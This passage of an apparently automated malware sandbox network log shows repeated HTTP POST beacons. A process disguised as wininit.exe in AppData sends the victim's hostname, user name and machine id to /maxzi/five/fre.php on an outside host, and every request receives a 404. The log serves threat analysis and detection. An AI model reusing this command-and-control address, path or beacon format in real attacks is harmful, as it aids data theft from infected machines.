                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    30192.168.2.224919394.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:43.518209934 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:43.523103952 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:44.416810036 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:44 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    31192.168.2.224919494.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:44.555685997 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:44.560564995 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:45.294429064 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:45 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    32192.168.2.224919594.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:45.435811996 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:45.440850973 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:46.174468994 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:46 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    33192.168.2.224919694.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:46.321557045 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:46.326513052 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:47.202565908 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:47 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    34192.168.2.224919794.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:47.357819080 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:47.362900972 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:48.276581049 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:47 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    35192.168.2.224919894.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:48.424141884 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:48.429054976 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:49.168529034 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:49 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    36192.168.2.224919994.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:49.321348906 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:49.331074953 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:50.089051008 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:49 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    37192.168.2.224920094.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:50.259922028 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:50.269289017 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:51.147424936 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:51 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    38192.168.2.224920194.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:51.460578918 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:51.465534925 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:52.239329100 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:52 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    39192.168.2.224920294.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:52.401020050 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:52.406147957 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:53.294938087 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:53 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    40192.168.2.224920394.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:53.443180084 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:53.449321985 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:54.189106941 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:54 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    41192.168.2.224920494.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:54.339132071 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:54.344079018 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:55.078644037 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:54 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    42192.168.2.224920594.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:55.460966110 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:55.469398022 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:56.212124109 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:56 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    43192.168.2.224920694.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:56.357142925 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:56.364429951 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:57.089220047 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:56 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    44192.168.2.224920794.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:57.224618912 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:57.229777098 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:57.994657040 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:57 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    45192.168.2.224920894.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:58.131937981 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:58.136925936 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:08:59.024342060 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:58 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    46192.168.2.224920994.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:08:59.165419102 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:08:59.170582056 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:00.048685074 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:08:59 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    47192.168.2.224921094.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:00.191670895 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:00.196734905 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:00.930401087 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:00 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    48192.168.2.224921194.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:01.092291117 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:01.097364902 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:01.830027103 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:01 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    49192.168.2.224921294.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:01.967614889 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
